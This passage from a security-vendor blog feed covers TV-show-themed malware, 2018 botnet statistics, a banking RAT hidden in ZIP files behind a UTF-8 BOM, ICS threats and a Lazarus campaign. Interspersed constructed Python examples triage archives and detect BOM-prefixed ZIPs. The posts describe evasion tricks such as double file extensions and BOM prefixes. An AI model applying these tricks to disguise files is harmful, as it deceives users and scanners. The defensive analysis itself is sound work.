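        zf.writestr("Game.of.Thrones.S07E01.HDTV.mkv.lnk", b"L\x00\x00\x00")  # placeholder, not a real .lnk
        folder = zipfile.ZipInfo("Data/")
        folder.external_attr = DOS_DIRECTORY | DOS_HIDDEN | DOS_SYSTEM
        zf.writestr(folder, b"")
        zf.writestr("Data/interpreter.exe", b"MZ")              # placeholder stand-in for the interpreter
        zf.writestr("Data/script.au3", b"; constructed placeholder")
        zf.writestr("Data/autorun_entry.lnk", b"L\x00")
    return buf.getvalue()


def build_double_ext_archive() -> bytes:
    """Constructed sample using the .avi.exe naming trick quoted in the report."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe", b"MZ")
    return buf.getvalue()


def build_clean_archive() -> bytes:
    """Constructed sample that looks like an ordinary video plus subtitles."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Episode.S01E01.mkv", b"\x1a\x45\xdf\xa3")  # Matroska magic bytes only
        zf.writestr("Episode.S01E01.srt", "1\n00:00:01,000 --> 00:00:02,000\nHi\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, build in (("decoy", build_decoy_archive), ("double-ext", build_double_ext_archive),
                         ("clean", build_clean_archive)):
        found = triage_archive(build())
        print(label, assess(found), found)
```
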

Not-a-virus rounds out the top three

The second and third place in the rating list of the most popular types of threats and their families are occupied by the not-a-virus families, also known as potentially unwanted software: adware and downloaders.

Example of a PC browser page with AdWare installed. Source: Kaspersky Lab

One of the most popular threat families is not-a-virus:AdWare.Win32.FileTour. Kaspersky Lab classifies it as a type of AdWare. While technically AdWare may represent legitimate software, in many cases users have to deal with file partner programs trying to install partner software and sometimes also download malware to their computers. Unlike not-a-viruses, these threats can vary in type and include malicious miners, password stealers, banking Trojans, and so forth. This happens because the owners of file partner programs often neither know, nor want to check what kind of software they distribute.

Just like not-a-virus:Downloader – another popular not-a-virus threat we will be describing in more detail later – it is distributed through download portals, yet unlike Downloaders it can also be spread through torrent trackers.

Example of an internet page on a PC with adware installed. Source: Kaspersky Lab

Another distinguishing feature of adware compared to the relatively innocent not-a-virus:Downloader is the use of more aggressive strategies. AdWare can trick its way into the users’ devices and play dirty, for instance, by disguising executable files (.exe files) as media (for example, The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe).

Example of an internet page on a PC with adware installed. Source: Kaspersky Lab

The third place is held by the not-a-virus:Downloader threat. This threat type can be completely innocent yet annoying as it will attempt to download utilities. Positioned as software made to simplify downloading files from the internet, the threat is used to distribute the leading malware family hiding behind the Game of Thrones title – MediaGet (we put it in the not-a-virus family: Downloader.Win32.MediaGet) – as well as many others such as uBar, AppDater, etc.

The typical not-a-virus:Downloader distribution scheme is quite simple – the user visits a website in search for a TV show or another media file and sees many different ‘download’ buttons.

Example of a hidden download agreement in not-a-virus:Downloader. Source: Kaspersky Lab

It is very difficult to figure out which one leads to the desired TV episode, so the user often ignores or misses the information displayed like ‘download using the download manager’.

As a result, instead of the video the user gets nothing but a utility-loader through which the content can be potentially downloaded.

Example of a not-a-virus:Downloader. Source: Kaspersky Lab

Downloader utilities themselves are usually quite harmless, yet they are trying to cement themselves firmly into the system and may show unwanted ads or suggest additional unwanted software. This is not dangerous but rather annoying.

Danger Things: how to stay safe

As the world tightens up policies regarding pirated content and treats intellectual property more like physical property, malware distributors seem to be leaving file hosting and torrent websites. But, as we said earlier, this might be due to increased popularity of streaming websites that do not require files to be downloaded, yet might be a source of different threats.

At the same time, we’ve seen that the number of users faced with TV-series-themed malware is still quite large and this threat is proving problematic to those who are looking for free content on the internet. Especially when it comes to extremely popular shows like Game of Thrones, The Walking Dead, Arrow and others. Game of Thrones deserves a special mention as it was one of the very few series which had no new episodes out last year but still topped the malware charts, according to Kaspersky Lab telemetry.

That said, it won’t come as a big surprise to see a new wave of malicious activity accompanying the release of the final season of Game of Thrones in April 2019.

The best way to avoid falling victim to any such hostile tactics and make sure you are not hit by a Trojan that will zombify your PC, but instead safely enjoy yet another episode of your favorite TV series, is to use only legitimate sources of content. But even if you do follow that rule, stay alert, as it is quite possible to encounter malicious activity accidentally.

To avoid threats coming from untrusted content distributing platforms, we recommend:

  • Pay close attention to website authenticity and do not visit them unless you are sure they are legitimate
  • Always make sure the website is genuine by double-checking the URL format or company name spelling before you download. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference
  • Pay attention to the extension of the downloaded file. If downloading TV show episodes, the file must not end in .exe
  • Be careful about the torrents you use and do look up the comments about the downloadable files. If comments are unrelated to the content, you are probably looking at malware
  • Don’t click on suspicious links promising exclusive early premiere of the latest episodes; consult the TV show schedule and keep track of it
  • Use reliable security solutions for comprehensive protection against a wide range of threats, such as Kaspersky Internet Security

March 29, 2019

Bots and botnets in 2018

Due to the wide media coverage of incidents involving Mirai and other specialized botnets, their activities have become largely associated with DDoS attacks. Yet this is merely the tip of the iceberg, and botnets are used widely not only to carry out DDoS attacks, but to steal various user information, including financial data. The attack scenario usually looks as follows:

  1. An attempt is made to infect a device with malware (if the botmaster’s aim is financial, a Trojan banker is deployed). If successful, the malware-infected device becomes part of the botnet under the control of a C&C center.
  2. The malware on the infected device receives a command from C&C containing the target mask (for example, the URL of an online banking service) and other data required for the attack.
  3. Having received the command, the malware monitors the actions of the user of the infected device and carries out the attack when that user visits a resource that matches the target mask.

Main types of botnet-assisted attacks are:

Unlike DDoS attacks, which affect the web resources of the victim organization, the attacks investigated in this report target the clients of the organization. The result of a successful attack can be:

  • Interception of user credentials
  • Interception of bank card data
  • Substitution of the transaction addressee (for example, the recipient of a banking transaction)
  • Another operation performed without the user’s knowledge, but in their name

Such scenarios are valid not only for the user’s bank accounts, but for other services too, as we shall see later.


Kaspersky Lab tracks botnet actions using the Botnet Monitoring technology, which emulates infected computers (bots) to obtain real-time data on the actions of botnet operators.

This analysis includes unique attacks registered by Botnet Monitoring in 2017 and 2018 and revealed by analysis of intercepted bots’ configuration files and C&C commands.

The attack target is the URL mask, extracted from the bot configuration file or the intercepted command (for example, the URL mask of an online banking site).

The ‘malware family’ in this report refers to publicly known names of malware, for example, ZeuS, TrickBot (Trickster), Cridex (Dridex, Feodo, Geodo, etc.), Ramnit (Nimnul).

Examples of target masks contained in registered commands

A unique attack in this analysis is taken as the unique combination of the target mask and the malware family (or its modification) that received the attack command. The rest of the data (injected scripts, rules for cryptowallets or URLs substitution, traffic redirection rules, patterns for credentials interception, etc.) were not taken into account when determining the uniqueness of an attack.

Excluded from the analysis are attacks related to company resources engaged in developing anti-malware solutions, since such attacks are security measures undertaken by malware to prevent treatment of an infected device (to prevent downloading of a security solution). Besides, we excluded attacks in which we could not uniquely identify the target, i.e. it was impossible to obtain additional information about the target from the target mask (for example, the “* bank *” target of BetaBot is not included in the analysis).

Only the number of unique attacks is taken into account, and not the total number of attacks of each particular family, because different families may receive commands with different frequencies.

The results are based on an analysis of commands from more than 60,000 different C&C centers linked to 150 malware families and their modifications.


The total number of unique attacks on clients of organizations registered by Botnet Monitoring technology in 2018 fell by 23.46% against the previous year (from 20,009 attacks in 2017 to 15,314 in 2018).

At the same time, 39.35% of the attacks we observed in 2018 were new, that is, the combination of the target mask and the family that received the attack command was not encountered in 2017. This is linked to both the emergence of new bankers (Danabot, BackSwap) and the desire of malware creators to change their target scope.

The geography of attacks’ targets in 2017 covered 111 countries; in 2018, attempts were made to attack clients of organizations in 101 countries.

Cybercriminals’ targets

To start with, we will examine the clients of which organizations are cybercriminals’ preferred targets.

In 2017, the largest share of attack targets belonged to the Financial Services category (77.44%). This includes online banking services, multibanking services, online stores, and other resources related to financial transactions (not including cryptocurrencies). This result is to be expected due to the greatest potential gains for the cybercriminals, who in the event of a successful attack gain direct access to the victim’s finances.

In second place by number of unique attacks is the Global Portals and Social Networks category (6.15%), which includes search engines, email services, and social networks. Search engines are placed in this group, because typically the main page of such systems provides a mailbox login form through which intruders try to steal credentials using the types of attacks described above.

Third place in our ranking goes to resources that provide various products and services (5.08%), but are not online stores. For example, hosting providers. In this case, as in the first category, the target is victims’ payment details. These resources are assigned to a separate group, since they offer a specific product or service, which indicates how precise the cybercriminals’ targeting can be.

Distribution of the number of unique attacks by attack target, 2017

Distribution of the number of unique attacks by attack target, 2018

In 2018, there were minor changes in the Top 3 targets of attacks on clients of various organizations. Interestingly, the share of unique attacks on financial services dropped by 3.51 p.p. to 73.93%.

The target mask received by the bot nearly always contains a domain or part of one. After analyzing the domains of masks pertaining to financial organizations (banks, investment, credit, pension institutions, etc.), we compiled a map of organizations whose clients were attacked by bots in 2018. The map indicates the numbers of financial organization domains observed in commands sent to bots.

It should be noted that one organization can own several domains, for example, divided according to a country’s territories.

Domain map of financial organizations observed in target masks, 2018

2018 saw a rise in botmasters’ interest in cryptocurrencies: The number of unique attacks on users linked to cryptocurrency services (exchanges, cryptocurrency wallets, etc.) increased, with their share more than tripling (up 4.95 p.p.) to 7.25%.

Cybercriminals actively tried to monetize interest in cryptocurrencies and obtain data from victims to steal funds. The majority of attacks that we detected on users of cryptocurrency services featured Ramnit Banker (53%). In addition, the Chthonic and Panda bankers, both modifications of the notorious ZeuS banker, dramatically increased the number of unique masks linked to cryptocurrency wallets and exchanges. The CapCoiner Trojan, which specifically targets such resources, also displayed major activity in this area.

Distribution of Trojans families by share of attacks on users of cryptocurrency services, 2018

Geography of attack targets

Note: If the target mask contains a TLD (top-level domain) that can be used to determine the country, this country is entered in the statistics. If the country cannot be determined from the TLD (for example, .com), the country where the organization’s headquarters are located is entered in the statistics.
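A reconstruction of the counting rules described in this report, as an added example and not Kaspersky’s Botnet Monitoring code: intercepted commands are reduced to unique attacks (target mask plus malware family) as defined in the methodology above, masks that cannot identify a target or that point at anti-malware vendors are excluded, and each target is attributed to a country from its TLD with the headquarters fallback from the note above. All command records and lookup tables are constructed.

```python
"""Added example, not Kaspersky's Botnet Monitoring code: unique-attack counting,
exclusion rules and country attribution as described in the report. The command
records, ccTLD table and headquarters lookup below are constructed."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed (family, target mask) pairs standing in for intercepted C&C commands
COMMANDS: List[Tuple[str, str]] = [
    ("Ramnit", "*examplebank.co.uk/login*"),
    ("Ramnit", "*examplebank.co.uk/login*"),         # repeat: same mask + family, counted once
    ("Ramnit", "https://examplebank.co.uk/*"),        # different mask, same family: another unique attack
    ("Panda", "*examplebank.co.uk/login*"),           # same mask, different family: another unique attack
    ("Trickster", "*/crypto-exchange.example.com/*"),
    ("BetaBot", "* bank *"),                          # no identifiable target: excluded
    ("Chthonic", "*wallet.example.de/*"),
    ("SpyEye", "*.example-av-vendor.com/*"),          # anti-malware vendor resource: excluded
]
PREVIOUS_YEAR: List[Tuple[str, str]] = [("Ramnit", "*examplebank.co.uk/login*")]  # constructed

CCTLD_COUNTRY = {"uk": "Britain", "de": "Germany", "it": "Italy", "ca": "Canada"}  # constructed, partial
HEADQUARTERS = {"crypto-exchange.example.com": "United States"}  # constructed HQ lookup for generic TLDs
AV_VENDOR_DOMAINS = {"example-av-vendor.com"}  # constructed


def mask_domain(mask: str) -> Optional[str]:
    """Pull the first dotted host name out of a wildcard mask; None if there is none."""
    m = re.search(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+", mask.lower())
    return m.group(0) if m else None


def _under(domain: str, parent: str) -> bool:
    return domain == parent or domain.endswith("." + parent)


def country_for(domain: str) -> str:
    """A ccTLD decides the country; for generic TLDs fall back to the headquarters table."""
    tld = domain.rsplit(".", 1)[-1]
    if tld in CCTLD_COUNTRY:
        return CCTLD_COUNTRY[tld]
    for hq_domain, country in HEADQUARTERS.items():
        if _under(domain, hq_domain):
            return country
    return "unknown"


def unique_attacks(commands: List[Tuple[str, str]]) -> List[Dict[str, str]]:
    """Deduplicate commands into unique attacks, applying the report's exclusion rules."""
    seen = set()
    attacks = []
    for family, mask in commands:
        domain = mask_domain(mask)
        if domain is None:                              # e.g. "* bank *": target not identifiable
            continue
        if any(_under(domain, d) for d in AV_VENDOR_DOMAINS):
            continue                                    # self-protection, not an attack on clients
        key = (family, mask)
        if key in seen:
            continue
        seen.add(key)
        attacks.append({"family": family, "mask": mask, "domain": domain,
                        "country": country_for(domain)})
    return attacks


def share_by(attacks: List[Dict[str, str]], field: str) -> Dict[str, float]:
    """Percentage share of unique attacks per value of `field` (family or country)."""
    counts = Counter(a[field] for a in attacks)
    total = sum(counts.values())
    return {k: round(100.0 * v / total, 2) for k, v in counts.items()}


def share_new(current: List[Dict[str, str]], previous: List[Tuple[str, str]]) -> float:
    """Share of this year's unique attacks whose (family, mask) pair was not seen last year."""
    old = set(previous)
    new = [a for a in current if (a["family"], a["mask"]) not in old]
    return round(100.0 * len(new) / len(current), 2)


if __name__ == "__main__":
    attacks = unique_attacks(COMMANDS)
    print(len(attacks), "unique attacks")
    print("by family:", share_by(attacks, "family"))
    print("by country:", share_by(attacks, "country"))
    print("new versus previous year:", share_new(attacks, PREVIOUS_YEAR), "%")
```
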

In 2018, the ranking of Top 10 countries by number of unique target masks changed order, but not composition. As in the previous year, clients of organizations in the US were the most frequent targets of attacks in 2018.

        2017                       2018
  1     United States   31.29%     United States   34.84%
  2     Germany         11.15%     Britain          9.97%
  3     Britain          9.20%     Italy            7.46%
  4     Italy            7.52%     Canada           6.16%
  5     Canada           6.96%     Germany          3.88%
  6     Australia        4.67%     Spain            3.14%
  7     France           4.57%     Switzerland      3.04%
  8     Spain            2.87%     France           3.02%
  9     China            2.50%     Australia        2.29%
  10    Switzerland      2.17%     China            2.11%

In 2018, the share of unique attacks on clients of organizations located in Germany fell significantly. This is because in 2017 most of these attacks were carried out by BetaBot (almost 75% of all registered unique attacks), while in 2018 its share barely exceeded 1.5%. Even with Danabot attacks registered in 2018 on clients of German banks, Germany still couldn’t retain second place in our ranking.

Geography of attack targets, 2017

Among the other changes observed was a decline in the share of attacked clients of Australian organizations from 4.67% to 2.29%. Almost all bots reduced the number of unique masks focused on Australia. For instance, among the Gozi banker attacks we observed in 2018, there were practically none against clients of financial organizations in Australia, whereas in 2017 they accounted for more than 90% of registered attacks by this malware.

Geography of attack targets, 2018

But it’s not all good news. Many varieties of malware expanded their geography: In 2018, the Trickster (TrickBot) banker added no fewer than 11 countries to its target list, while the SpyEye Trojan and the IcedID banker picked up 9 and 5 more countries, respectively.

Unsurprisingly, the most frequently attacked users of cryptocurrency services were located in the US, Luxembourg, and China, since many cryptocurrency services are registered in these countries. In addition, the number of attacks in 2018 on users of services registered in Britain, Singapore, Estonia, South Korea, and Switzerland climbed significantly.

Geography of cryptocurrency services whose users were attacked, 2017

Geography of cryptocurrency services whose users were attacked, 2018

Geography of C&C centers

This section gives statistics on the geography of botnet C&C centers that sent commands to launch an attack.

In 2017, the largest slice of C&C centers was located in Ukraine (24.25%), with almost 60% of them made up of C&C servers for the abovementioned Gozi banker.

Geography of C&C centers in 2017

In 2018, Russia (29.61%) was top of the leaderboard by number of C&C centers directing attacks against clients of various organizations. More than half (54%) of these C&C centers were used by the Panda banker.

Geography of C&C centers, 2018

Most active families

BetaBot

Trojan Banker BetaBot accounted for 13.25% of all unique attacks in 2018.

Geography of BetaBot targets, 2018

Key features (shares relative to the number of unique BetaBot attacks):

  • Geography of targets: 42 countries
  • Most attacked countries: US (73.60%), China (6.35%), Britain (6.11%)
  • Most attacked categories of organizations: Financial Services (37.43%), Global Portals and Social Networks (18.16%)

Trickster (TrickBot)

The TrickBot banker accounted for 12.85% of all unique attacks in 2018.

Geography of TrickBot targets, 2018

Key features (shares relative to the number of unique TrickBot attacks):

  • Geography of targets: 65 countries
  • Most attacked countries: Britain (11.02%), US (9.34%), Germany (7.99%)
  • Most attacked categories of organizations: Financial Services (96.97%), Cryptocurrency Services (1.72%)

The Panda banker accounted for 9.84% of all unique attacks in 2018.

Geography of Panda targets, 2018

Key features (shares relative to the number of unique Panda attacks):

  • Geography of targets: 33 countries
  • Most attacked countries: Canada (24.89%), US (22.93%), Italy (17.90%)
  • Most attacked categories of organizations: Financial Services (80.88%), Cryptocurrency Services (10.26%)

SpyEye accounted for 8.05% of all unique attacks in 2018.

Geography of SpyEye targets, 2018

Key features (shares relative to the number of unique SpyEye attacks):

  • Geography of targets: 32 countries
  • Most attacked countries: US (35.01%), Britain (14.38%), Germany (13.57%)
  • Most attacked categories of organizations: Financial Services (98.04%)

Ramnit accounted for 7.97% of all unique attacks in 2018 registered by Botnet Monitoring. Ramnit’s impressive geography covers 66 countries.

Geography of Ramnit targets, 2018

Key features (shares relative to the number of unique Ramnit attacks):

  • Geography of targets: 66 countries
  • Most attacked countries: Britain (25.70%), US (20.12%), China (7.78%)
  • Most attacked categories of organizations: Financial Services (47.76%), Cryptocurrency Services (46.83%)

Our analysis of commands issued to attack clients of organizations in 2018 identified the following main trends:

  • The reduction in the total number of registered unique attacks may indicate cybercriminals’ preference to create target masks that cover a large number of resources of one organization and stay relevant for a prolonged period.
  • The absolute majority of attacks still target financial organizations and their clients.
  • The number of attacks on clients of cryptocurrency services increased significantly (compared to 2017). The number of such attacks is not expected to fall; on the contrary, it may rise given that more and more bots are deploying web injections against such resources.
  • New target masks are proliferating. Cybercriminals are adding new, previously unencountered targets as well as modifying old masks to cover more websites where user data or money can be stolen.

28 March 2019

The return of the BOM

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. As McAfee reported in 2013, prepending the extra bytes of a UTF-8 BOM (Byte Order Mark) helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found at the start of UTF-8 text files. Some tools will not recognize this file as a ZIP archive, but will instead treat it as a UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore these leading bytes and extract the content correctly. Once the user extracts the archive with one of these utilities, they can run the executable and infect the system.
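The mismatch described above, as an added example that is not code from the original post: a magic-byte check that files the BOM-prefixed archive under UTF-8 text, beside a parser that skips the BOM and reads the ZIP local file header the way a tolerant extractor does. The sample archive is constructed in memory and harmless.

```python
"""Spot ZIP archives hidden behind a UTF-8 BOM (constructed demo, not Kaspersky code)."""
import io
import struct
import zipfile

UTF8_BOM = b"\xef\xbb\xbf"      # the three 0xEFBBBF bytes described above
ZIP_LOCAL_SIG = b"PK\x03\x04"   # ZIP local file header signature (0x504B0304)


def classify(data: bytes) -> str:
    """Classify by leading bytes only: 'zip', 'bom-zip' or 'other'.

    A scanner that trusts the first bytes would file a 'bom-zip' sample
    as UTF-8 text and never look inside it; that is the evasion at work.
    """
    if data.startswith(ZIP_LOCAL_SIG):
        return "zip"
    if data.startswith(UTF8_BOM + ZIP_LOCAL_SIG):
        return "bom-zip"
    return "other"


def parse_local_header(data: bytes) -> dict:
    """Parse the first local file header, skipping a leading BOM if present."""
    off = len(UTF8_BOM) if data.startswith(UTF8_BOM) else 0
    (sig, _ver, _flags, method, _mtime, _mdate, _crc,
     _csize, usize, name_len, _extra_len) = struct.unpack_from("<4sHHHHHIIIHH", data, off)
    if sig != ZIP_LOCAL_SIG:
        raise ValueError("no ZIP local file header at offset %d" % off)
    name = data[off + 30: off + 30 + name_len].decode("utf-8", "replace")
    return {"bom_offset": off, "method": method, "name": name, "size": usize}


def entry_names(data: bytes) -> list:
    """List entries the way a tolerant extractor (WinRAR, 7-Zip) would:
    drop the leading BOM and read the archive behind it."""
    payload = data[len(UTF8_BOM):] if data.startswith(UTF8_BOM) else data
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        return zf.namelist()


def build_sample(with_bom: bool) -> bytes:
    """Constructed sample: a harmless one-entry archive, optionally BOM-prefixed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.txt", "constructed sample content\n")
    return (UTF8_BOM if with_bom else b"") + buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        sample = build_sample(flag)
        print(classify(sample), parse_local_header(sample), entry_names(sample))
```

A scanner that only looks at leading bytes should be taught to skip the BOM (as parse_local_header does) before deciding a file is plain text.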

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource is encrypted with an XOR-based algorithm commonly seen in malware samples from Brazil. The decrypted resource is a DLL that the loader loads and then calls via the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library then downloads a second-stage payload: a password-protected ZIP file encrypted with the same function as the embedded payload. After extracting all the files, the loader launches the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload delivered is a variant of Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise


27 March 2019

Threat Landscape for Industrial Automation Systems in H2 2018

H2 2018 in figures

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

In H2 2018:

  • Kaspersky Lab products prevented malicious activity on 40.8% of ICS computers.
  • Kaspersky Lab security solutions detected over 19.1 thousand malware modifications from 2.7 thousand different families on industrial automation systems. As before, in the overwhelming majority of cases, attempted infections of ICS computers are random rather than parts of targeted attacks.
  • Trojan malware remains the most prevalent among threats that are relevant to ICS computers. Malware of this class was detected on 27.1% of ICS computers. The malicious activity of exploits was prevented on 3.2% of ICS computers, backdoors were blocked on 3.1%, and ransomware on 2% of ICS computers.

Percentage of ICS computers on which malicious objects of different classes were prevented, 2017 – 2018

  • In each month of 2018, the proportion of ICS computers on which malicious activity was prevented was higher than that in the same month of 2017.

Percentage of ICS computers on which malicious objects were detected

  • Countries with the highest proportions of ICS computers on which malicious objects were detected during H2 2018 were Vietnam (70.1%), Algeria (69.9%), and Tunisia (64.6%).
  • The most secure countries are Ireland (11.7%), Switzerland (14.9%), Denmark (15.2%), Hong Kong (15.3%), the UK (15.7%), and the Netherlands (15.7%).

Percentage of ICS computers on which malicious objects were detected in different countries of the world

  • As in the past years, the main sources of threats to computers in the industrial infrastructure of organizations are the internet (26.1%), removable media (8.3%), and email (4.9%).

Percentage of ICS computers on which malicious objects from different sources were detected

  • The percentage of ICS computers on which malicious email attachments were blocked has increased in nearly all regions of the world. This change probably reflects the growth in the number of phishing attacks on industrial enterprises in H2 2018.

Percentage of ICS computers on which malicious email attachments were blocked in different regions of the world

  • Phishing attacks are the main vector of targeted attacks on industrial companies. Malicious attachments from phishing emails pose a danger not only to office computers but also to some of the computers in the industrial infrastructure: Trojan-spy, backdoor and keylogger malware was blocked on at least 4.3% of ICS computers globally. All of these types of malware often show up in the phishing emails sent to industrial enterprises.
  • Western Europe (5.1%) is, surprisingly, one of the TOP 3 regions based on the percentage of ICS computers on which malicious email attachments were blocked. This is in large part due to the percentage for Germany nearly doubling (from 3.6% to 6.5%).

Vulnerabilities identified by Kaspersky Lab ICS CERT in 2018

Kaspersky Lab ICS CERT experts continued the previous year’s research on security issues affecting third-party hardware-based and software solutions that are widely used in industrial automation systems. A particular emphasis was placed on open-source products used in various vendors’ solutions. Analyzing car software for vulnerabilities became a new area of research for Kaspersky Lab ICS CERT.

  • In 2018, Kaspersky Lab ICS CERT identified 61 vulnerabilities in industrial and IIoT/IoT systems. Vendors closed 29 of these vulnerabilities during the year.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by types of components analyzed

  • 46% of the vulnerabilities identified, if exploited, could lead to remote execution of arbitrary code on the target system or a denial-of-service (DoS) condition. A significant part of the vulnerabilities (21%) could also enable an attacker to bypass authentication.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by possible exploitation consequences

  • During 2018, 37 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT (information on 15 vulnerabilities closed in 2018 had been provided to vendors in 2017).
  • The absolute majority of those vulnerabilities identified by Kaspersky Lab ICS CERT for which CVEs were published in 2018 have CVSS v.3 base scores of 7.0 or more, which places them in the most severe group. Seven of these vulnerabilities were assigned the highest possible base score of 10. These include vulnerabilities in third-party software, and LibVNCServer and LibVNCClient cross-platform solutions.

You can find information on the key events of H2 2018, an overview of vulnerabilities published during the year, and detailed statistics in the full version of the report on the Kaspersky Lab ICS CERT website.

26 March 2019

Cryptocurrency businesses still being targeted by Lazarus

It’s hardly news to anyone who follows cyberthreat intelligence that the Lazarus APT group targets financial entities, especially cryptocurrency exchanges. Financial gain remains one of the main goals for Lazarus, with its tactics, techniques, and procedures constantly evolving to avoid detection.

In the middle of 2018, we published our Operation Applejeus research, which highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target macOS. Since then Lazarus has been busy expanding its operations for the platform.

Further tracking of their activities targeting the financial sector enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and macOS malware for Apple users.

Infection procedure

Lazarus is a well-organized group, something that can be seen from their malware population: not only have we seen them build in redundancy, keeping some malware in reserve as a hot spare to replace ‘burnt’ (detected) samples mid-operation, but they also conform to specific internal standards and protocols when developing backdoors. This case is no different. They have developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects. After establishing the malware control session with the server, the functionality provided by the malware includes:

  • Set sleep time (delay between C2 interactions)
  • Exit malware
  • Collect basic host information
  • Check malware status
  • Show current malware configuration
  • Update malware configuration
  • Execute system shell command
  • Download & Upload files

Lazarus uses different tactics to run its C2 servers: from purchasing servers to using hacked ones. We have seen some legitimate-looking servers that are most likely compromised and used in malicious campaigns. According to server response headers, they are most likely running an old vulnerable instance of Internet Information Services (IIS) 6.0 on Microsoft Windows Server 2003. Another C2 server was probably purchased by Lazarus from a hosting company and used to host macOS and Windows payloads. The geography of the servers varies, from China to the European Union. But why use two different types of servers? The group seems to have a rule (at least in this campaign) to only host malware on rented servers, while hosting C2 scripts for malware communication on compromised servers.

Infrastructure segregation by purpose

The malware was distributed via documents carefully prepared to attract the attention of cryptocurrency professionals. Since some of the documents were prepared in Korean, we believe that South Korean businesses are a high priority for Lazarus. One document entitled ‘Sample document for business plan evaluation of venture company’ (translated from Korean) looks like this:

Content of weaponized document from Lazarus (4cbd45fe6d65f513447beb4509a9ae3d)

Another macro-weaponized document (e9a6a945803722be1556fd120ee81199) contains a business overview of what seems to be a Chinese technology consulting group named LAFIZ. We couldn’t confirm if it’s a legitimate business or another fake company made up by Lazarus. Their website lafiz[.]link has been parked since 2017.

Contents of another weaponized document (e9a6a945803722be1556fd120ee81199)

Based on our telemetry, we found a cryptocurrency exchange company attacked with a malicious document containing the same macro. The document’s content provided information for coin listings with a translation in Korean:

Content of another weaponized document (6a0f3abd05bc75edbfb862739865a4cc)

The payloads show that Lazarus keeps exploring more ways to evade detection to stay under the radar longer. The group builds malware for 32-bit and 64-bit Windows separately to support both platforms and have more variety in terms of compiled code. The Windows payloads distributed from the server (nzssdm[.]com) hosting the Mac malware have a CheckSelf export function, and one of them (668d5b5761755c9d061da74cb21a8b75) has the internal name ‘battle64.dll’. From that point we managed to find additional Windows malware samples containing the CheckSelf export function and an internal name containing the word ‘battle’.

These Windows malware samples were delivered using malicious HWP (Korean Hangul Word Processor format) documents exploiting a known PostScript vulnerability. It should be noted that HWP documents are only popular among Korean users (Hangul Word Processor was developed in South Korea) and we have witnessed several attacks using the same method.

Connection with previous HWP attacks

It’s no secret that Apple products are now very popular among successful internet startups and fintech companies, and this is why the malicious actor built and used macOS malware. While investigating earlier Lazarus incidents, we anticipated this actor would eventually expand its attacks to macOS.

It appears that Lazarus is using the same developers to expand to other platforms, because some of the features have remained consistent as its malware evolves.

Overlap of current campaign and previous hwp-based attack cases

We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal. And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. Avoid being infected by fake or backdoored software from Lazarus – if you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. We’ll continue posting on Lazarus’s latest tactics and tricks in our blog. In the meantime, stay safe!

For more details on this and other research, please contact intelreports@kaspersky.com.

File Hashes:
